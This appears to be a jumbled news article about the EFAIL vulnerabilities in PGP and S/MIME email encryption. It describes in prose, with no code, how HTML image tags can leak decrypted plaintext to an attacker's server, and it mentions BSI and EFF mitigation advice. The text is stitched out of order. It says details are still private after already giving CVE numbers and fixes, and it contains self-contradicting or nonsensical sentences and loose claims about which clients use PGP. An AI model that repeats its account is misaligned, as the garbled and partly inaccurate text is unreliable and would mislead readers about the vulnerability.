To prevent a breach, the BSI said that users needed to secure access to their mailboxes and prevent their email clients from loading HTML code from external websites. The PGP CFB gadget attack was assigned CVE-2017-17688, while the S/MIME CBC vulnerability was given CVE-2017-17689. PGP encryption is used by some of the bigger guys such as Apple Mail, Outlook, and Thunderbird. The researchers have already contacted email service providers through the Electronic Frontier Foundation.
In a message on social networking siteTwitter, security researcher Sebastian Schnizel has warned of 'critical vulnerabilities in PGP/GPG and S/MIME email encryption, ' the details of which are being kept private until tomorrow morning.
When the victim's email client opens this email, it will decrypt the text, but also treat everything between the opened and closed image attribute tags as the source of the image. By also including the Web address of an attacker-controlled server, the newly sent emails can cause the programs to send the corresponding plaintext to the server.
Enigmail's Robert Hansen tweeted that "GnuPG has given warnings on missing/malformed [authentication encryption] for years". He recommended switching off HTML emails or using authenticated encryption. Will devs willingly fix their implementations of OpenPGP, or will authenticated encryption have to be made a mandatory part of using the protocol?
Yet others take issue with that line. It is one of the standard encryption program tools used for signing MIME data.
In any event, the issue appears to be more serious for S/MIME than it is for OpenPGP.
A more detailed explanation and analysis will be forthcoming once the research is formally released tomorrow, but the vulnerabilities are thought to affect both PGP and the S/MIME public key encryption standard. This is not surprising as PGP encryption has so far been considered rock solid.
As of now, there are not many details available on the latest vulnerability, but more information is expected to be shared by the researchers soon. On the other hand, S/MIME is used mainly in enterprise infrastructure. Because the HTML rendering engine is enabled, this prompts the mail client to treat the message body as a URL, which it encodes and queries the malicious actor's server, thereby leaking the message.
The EFF, which in its alert published specific ways to disable it in specific clients, echoed the assessment.
A group of European security researchers have discovered vulnerabilities that could be exploited to "reveal the plaintext of encrypted emails", including those sent in the distant past, CSO reported.